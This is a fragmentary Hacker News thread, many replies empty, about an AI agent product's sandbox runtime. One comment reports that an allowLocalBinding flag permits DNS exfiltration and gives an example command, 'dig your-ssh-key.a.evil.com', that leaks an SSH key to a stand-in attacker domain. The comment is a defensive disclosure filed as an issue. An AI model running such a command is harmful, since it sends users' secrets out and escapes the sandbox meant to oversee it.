(no title)
felixrieseberg | 1 month ago
There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".
felixrieseberg | 1 month ago
There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".
srcreigh|1 month ago
Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is...
How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the information to evil.com servers.
inopinatus|1 month ago
ummonk|1 month ago
philipwhiuk|1 month ago
nijave|1 month ago
k-o-n-t-o-r|1 month ago
https://github.com/k-o-n-t-o-r/dnsm
pixl97|1 month ago
For smaller entities it's a bigger pain.
catoc|1 month ago
Do all files accessed in mounted folders now fall under collectable “Inputs” ?
Ref: https://www.anthropic.com/legal/privacy
adastra22|1 month ago
nemomarx|1 month ago
fragmede|1 month ago
Wolfbeta|1 month ago
`sudo zfs set snapdir=visible pool/dataset`
jpeeler|1 month ago
arianvanp|1 month ago
I replaced it with a landlock wrapper
ottah|1 month ago
k-o-n-t-o-r|1 month ago
https://github.com/k-o-n-t-o-r/dnsm
l9o|1 month ago
simonw|1 month ago
Update: I added more details by prompting Cowork to:
> Write a detailed report about the Linux container environment you are running in
https://gist.github.com/simonw/35732f187edbe4fbd0bf976d013f2...
thecupisblue|1 month ago
Not because of the execution itself, great job on that - but because I was working on exactly this - guess I'll have to ship faster :)
PAndreew|1 month ago